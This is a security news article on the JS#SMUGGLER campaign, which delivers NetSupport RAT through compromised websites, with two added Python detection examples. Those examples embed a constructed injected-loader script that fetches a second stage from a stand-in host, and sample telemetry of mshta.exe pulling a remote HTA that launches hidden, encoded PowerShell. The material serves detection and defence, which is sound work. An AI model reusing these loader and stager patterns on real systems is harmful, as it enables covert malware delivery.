
Researchers Warn of New JS#SMUGGLER Campaign Delivering NetSupport RAT through Compromised Websites

Cybersecurity researchers have warned of a new malware campaign, tracked as JS#SMUGGLER, that uses compromised websites to distribute the NetSupport remote access trojan (RAT). Securonix analysed the attack chain and describes it as a multi-stage sequence built to evade detection and hand attackers full control of infected systems. 

The chain begins with an obfuscated JavaScript loader injected into a compromised website. That loader hands off to an HTML Application (HTA) file, fetched and executed through the built-in Windows utility mshta.exe; the HTA in turn launches an encrypted PowerShell stager, and the PowerShell payload downloads the main RAT. 

According to researchers Akshay Gaikwad, Shikha Sangwan, and Aaron Beardslee, “NetSupport RAT enables full attacker control over the victim host, including remote desktop access, file operations, command execution, data theft and proxy capabilities.” 

There is currently no clear attribution to a specific threat group or country. The campaign reaches enterprise users by redirecting them through compromised websites, which points to broad, opportunistic targeting rather than a sector-specific effort. 

Securonix said the malware relies on hidden iframes, obfuscated JavaScript loaders and layered script execution. When a victim visits a compromised website, the injected script checks the device type: mobile users are shown a full-screen iframe, while desktop users are served a second-stage malicious script. 

A visit-tracking check makes the payload fire only on the first visit, which helps avoid detection (a repeat visit, including an analyst reloading the page, sees nothing). The first-stage script assembles the URL of the HTA payload at runtime and launches it with mshta.exe. The HTA file then runs a temporary PowerShell stager in memory, keeps its window hidden and deletes itself afterwards to reduce forensic traces. 
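A static triage pass over a fetched page for the web-side pattern described above, as an added example (not Securonix's tooling or code from the campaign). The sample page, the `.invalid` hostnames and the function names `audit_html` / `PageAuditor` are constructed for illustration; the indicators (off-screen or viewport-covering iframes, and inline scripts that combine user-agent sniffing, runtime script/iframe creation, string obfuscation and a first-visit gate) are heuristics for triage, not a signature for the real loader.

```python
"""Heuristic static scan of a web page for injected loader patterns.

Added example, not Securonix's code. SAMPLE_HTML is constructed and does not
reproduce the real injected script; the checks are triage heuristics.
"""
import re
from html.parser import HTMLParser

# Constructed sample: a normal page with an injected off-screen iframe and an
# inline loader that gates on first visit, sniffs the device type and builds
# its next-stage URLs at runtime. Hostnames use reserved TLDs.
SAMPLE_HTML = """<html><head><title>Shop</title>
<script src="/assets/app.js"></script>
</head><body>
<h1>Welcome</h1>
<iframe src="https://maps.example/embed" width="400" height="300"></iframe>
<iframe src="https://example.invalid/t" style="position:absolute;left:-9999px;width:1px;height:1px"></iframe>
<script>
(function(){
  if (localStorage.getItem("_v")) { return; }   // fire on first visit only
  localStorage.setItem("_v", "1");
  var m = /Android|iPhone|iPad|Mobile/i.test(navigator.userAgent);
  if (m) {
    var f = document.createElement("iframe");
    f.style = "position:fixed;top:0;left:0;width:100vw;height:100vh;border:0";
    f.src = atob("aHR0cHM6Ly9leGFtcGxlLmludmFsaWQvbQ==");
    document.body.appendChild(f);
  } else {
    var s = document.createElement("script");
    s.src = String.fromCharCode(104,116,116,112,115,58,47,47) + "example.invalid/s2.js";
    document.head.appendChild(s);
  }
})();
</script>
</body></html>"""

# Styling that keeps an iframe out of sight, or makes it cover the viewport.
HIDDEN_STYLE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|opacity\s*:\s*0(?![.\d])"
    r"|(?:left|top)\s*:\s*-\d{3,}|(?:width|height)\s*:\s*[01]px", re.I)
FIXED_POSITION = re.compile(r"position\s*:\s*fixed", re.I)
VIEWPORT_SIZE = re.compile(r"100(?:vw|vh|%)", re.I)

# Inline-script indicators; a script showing two or more of them is flagged.
SCRIPT_INDICATORS = {
    "device_sniffing": re.compile(r"navigator\.userAgent", re.I),
    "dynamic_loading": re.compile(
        r"createElement\(\s*['\"](?:script|iframe)['\"]\s*\)|document\.write\s*\(", re.I),
    "obfuscation": re.compile(
        r"String\.fromCharCode|\batob\s*\(|\beval\s*\(|\bunescape\s*\(", re.I),
    "first_visit_gate": re.compile(
        r"(?:localStorage|sessionStorage)\.(?:getItem|setItem)|document\.cookie", re.I),
}


class PageAuditor(HTMLParser):
    """Collects iframe and inline-script findings while parsing the page."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._in_script = False      # inside an inline <script> body
        self._script_buf = []
        self._script_line = 0

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe":
            style = a.get("style") or ""
            reasons = []
            if HIDDEN_STYLE.search(style):
                reasons.append("hidden or off-screen styling")
            if FIXED_POSITION.search(style) and VIEWPORT_SIZE.search(style):
                reasons.append("fixed, viewport-sized overlay")
            if reasons:
                self.findings.append({"kind": "iframe", "line": self.getpos()[0],
                                      "src": a.get("src"), "reasons": reasons})
        elif tag == "script" and "src" not in a:
            self._in_script, self._script_buf = True, []
            self._script_line = self.getpos()[0]

    def handle_data(self, data):
        if self._in_script:
            self._script_buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            body = "".join(self._script_buf)
            hits = [name for name, rx in SCRIPT_INDICATORS.items() if rx.search(body)]
            if len(hits) >= 2:
                self.findings.append({"kind": "inline_script", "line": self._script_line,
                                      "indicators": hits})


def audit_html(html):
    """Return a list of findings (dicts with 'kind', 'line' and details)."""
    p = PageAuditor()
    p.feed(html)
    p.close()
    return p.findings


if __name__ == "__main__":
    for f in audit_html(SAMPLE_HTML):
        print(f)
```

Run it against a page fetched with the site's own URL and compare against a known-good copy from the CMS; the off-screen iframe and the combination of indicators in one inline script are what an integrity monitor should raise, while the plain `<script src>` tag and the benign maps embed are ignored.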

Once executed, the PowerShell payload downloads NetSupport RAT, giving the attacker remote control of the infected machine. Securonix called the campaign evidence of “a sophisticated and actively maintained malware framework.” 

The company advised defenders to use strong content security policies, script monitoring, PowerShell logging (script block and module logging) and restrictions on mshta.exe, for example through application control, to detect and block similar activity. 
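An endpoint-side detection for the mshta.exe to PowerShell hand-off described above, as an added example and not Securonix's detection content. The process-creation records are constructed (Sysmon Event ID 1 style fields: process id, parent id, image, command line) and are not telemetry from the campaign; `ProcEvent`, `Alert`, `detect` and `parse_powershell_flags` are names chosen here. The flag parser mirrors how powershell.exe resolves switches (any unambiguous prefix of the parameter name, plus fixed aliases such as `-ep` and `-ec`, with `-`, `/` or a Unicode dash as the marker), which is why a rule that matches only the literal string `-EncodedCommand` misses most real stagers.

```python
"""Process-creation detection for mshta.exe launching hidden PowerShell.

Added example, not Securonix's rules. EVENTS is constructed test telemetry.
"""
import base64
import ntpath
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


@dataclass
class Alert:
    pid: int
    rule: str
    reasons: list
    decoded: str = None   # decoded -EncodedCommand text, when one was present


BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "iexplore.exe", "brave.exe", "opera.exe"}
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
REMOTE_ARG = re.compile(r"https?://|\\\\[^\\\s]+\\", re.I)        # URL or UNC path
INLINE_PROTO = re.compile(r"\b(?:javascript|vbscript):", re.I)     # script passed inline
RISKY_FLAGS = {"hidden_window", "encoded_command", "bypass_policy"}

# Constructed telemetry: browser -> mshta.exe with a remote HTA -> hidden, encoded
# PowerShell, plus two benign look-alikes that must not alert.
EVENTS = [
    ProcEvent(4120, 900, r"C:\Program Files\Mozilla Firefox\firefox.exe",
              r'"C:\Program Files\Mozilla Firefox\firefox.exe"'),
    ProcEvent(5012, 4120, r"C:\Windows\System32\mshta.exe",
              r'"C:\Windows\System32\mshta.exe" https://example.invalid/x.hta'),
    ProcEvent(5100, 5012, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -w hidden -nop -ep bypass -enc dwBoAG8AYQBtAGkA"),
    ProcEvent(6000, 900, r"C:\Windows\System32\mshta.exe",
              r'"C:\Windows\System32\mshta.exe" "C:\Program Files\Vendor\setup.hta"'),
    ProcEvent(6100, 700, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"),
]

DASHES = "-/\u2013\u2014"   # powershell.exe treats -, / and en/em dashes as switch markers


def _switch(tok, full, minimum, aliases=()):
    """True if tok is a prefix of `full` of at least `minimum` chars, or a fixed alias."""
    t = tok.lstrip(DASHES).lower()
    return t in aliases or (len(t) >= minimum and full.startswith(t))


def parse_powershell_flags(cmdline):
    """Return (set of notable flags, decoded EncodedCommand text or None)."""
    toks = cmdline.split()
    flags, decoded = set(), None
    for i, tok in enumerate(toks):
        if tok[:1] not in DASHES:
            continue
        nxt = toks[i + 1].lower() if i + 1 < len(toks) else ""
        if _switch(tok, "windowstyle", 1) and nxt == "hidden":
            flags.add("hidden_window")
        elif _switch(tok, "executionpolicy", 2, aliases=("ep",)) and nxt in ("bypass", "unrestricted"):
            flags.add("bypass_policy")
        elif _switch(tok, "noprofile", 3):
            flags.add("no_profile")
        elif _switch(tok, "encodedcommand", 1, aliases=("ec",)):
            flags.add("encoded_command")
            try:   # -EncodedCommand takes base64 of UTF-16LE text
                decoded = base64.b64decode(toks[i + 1]).decode("utf-16-le")
            except (IndexError, ValueError, UnicodeDecodeError):
                decoded = None
    return flags, decoded


def detect(events):
    """Apply the mshta and PowerShell rules to a batch of process-creation events."""
    by_pid = {e.pid: e for e in events}
    alerts = []
    for e in events:
        name = ntpath.basename(e.image).lower()
        parent = by_pid.get(e.ppid)
        pname = ntpath.basename(parent.image).lower() if parent else ""
        if name == "mshta.exe":
            reasons = []
            if REMOTE_ARG.search(e.cmdline):
                reasons.append("remote HTA (URL or UNC path) on command line")
            if INLINE_PROTO.search(e.cmdline):
                reasons.append("inline javascript:/vbscript: payload")
            if pname in BROWSERS:
                reasons.append(f"spawned by browser {pname}")
            if reasons:
                alerts.append(Alert(e.pid, "mshta_suspicious", reasons))
        elif name in ("powershell.exe", "pwsh.exe"):
            flags, decoded = parse_powershell_flags(e.cmdline)
            risky = sorted(flags & RISKY_FLAGS)
            from_host = pname in SCRIPT_HOSTS
            reasons = ([f"parent is script host {pname}"] if from_host else []) + risky
            if from_host or len(risky) >= 2:
                rule = "script_host_powershell" if from_host else "powershell_evasive_flags"
                alerts.append(Alert(e.pid, rule, reasons, decoded))
    return alerts


if __name__ == "__main__":
    for a in detect(EVENTS):
        print(a)
```

The local `setup.hta` launched by an installer and the scheduled `-File backup.ps1` stay quiet; the browser-spawned mshta.exe with a URL argument and its hidden, encoded child alert on two independent rules, which is the point of logging process creation with parent relationships rather than matching command lines in isolation.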

Securonix's write-up also describes a JavaScript dropper that writes two further files to the user's TEMP directory: 

  • svchost.js, which installs the .NET loader known as DarkTortilla 
  • adobe.js, which drops PHat.jar, described by the researchers as an MSI installer with similar behaviour 

The loader then decrypts and runs an embedded DLL carrying Formbook, a keylogger and information stealer. Persistence is achieved by placing the payload in the Windows Startup folder or by adding autostart entries to the Windows Registry. Securonix noted, “The threat actors combine social engineering, heavy script obfuscation and advanced .NET evasion techniques to successfully compromise targets.” 

The researchers added that reflective loading lets the final payload execute from memory without ever being written to disk as a conventional file, which complicates investigation. The disclosure follows recent research from the same firm on CHAMELEON#NET, another multi-stage campaign that delivers Formbook via phishing messages. That campaign targeted the National Social Security sector and used fake webmail login pages and compressed archives to lure victims.